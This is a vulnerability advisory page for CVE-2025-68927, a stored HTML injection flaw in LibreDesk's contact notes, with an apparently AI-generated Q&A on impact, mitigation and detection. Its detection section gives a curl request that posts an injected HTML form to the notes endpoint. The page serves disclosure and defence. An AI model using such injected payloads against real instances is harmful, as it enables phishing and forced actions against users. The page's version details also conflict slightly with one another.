CVE-2025-68927
Stored HTML Injection in LibreDesk Contact Notes Enables Phishing
Publication date: 2025-12-27
Last updated on: 2025-12-27
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| libredesk | libredesk | 0.8.6-beta |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability in LibreDesk prior to version 0.8.6-beta allows an attacker to perform stored HTML injection via the contact notes feature. Normally, user input is wrapped in <p> tags, but by intercepting and modifying the request to remove these tags, an attacker can inject arbitrary HTML elements such as forms and images. These malicious elements are stored and rendered without proper sanitization, enabling attacks like phishing, CSRF-style forced actions, and UI redress attacks.
How can this vulnerability impact me? :
The vulnerability can lead to serious security issues including phishing attacks where users may be tricked into submitting sensitive information, CSRF-style forced actions that can manipulate user actions without their consent, and UI redress attacks that can alter the appearance of the interface to deceive users. These impacts can compromise user trust, data integrity, and overall system security.
What immediate steps should I take to mitigate this vulnerability?
The immediate step to mitigate this vulnerability is to upgrade LibreDesk to version 0.8.6-beta or later, where the stored HTML injection issue in the contact notes feature has been patched.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by intercepting and inspecting POST requests to the endpoint /api/v1/contacts/{id}/notes to check if the note content is being wrapped automatically in <p> tags or if arbitrary HTML elements can be injected by removing these tags. A practical approach is to use a proxy tool like Burp Suite or curl combined with manual modification of the POST data to remove <p> tags and inject HTML elements such as <form> or <img>. For example, you can use curl to send a crafted POST request without <p> tags and observe if the injected HTML is stored and rendered. Example curl command: curl -X POST -H "Content-Type: application/json" -d '{"note": "<form><input name=\"test\"></form>"}' https://your-libredesk-instance/api/v1/contacts/{id}/notes. If the injected HTML is stored and rendered without sanitization, the system is vulnerable. Additionally, monitoring network traffic for POST requests to this endpoint and checking if the note content includes unexpected HTML elements can help detect exploitation attempts. [2]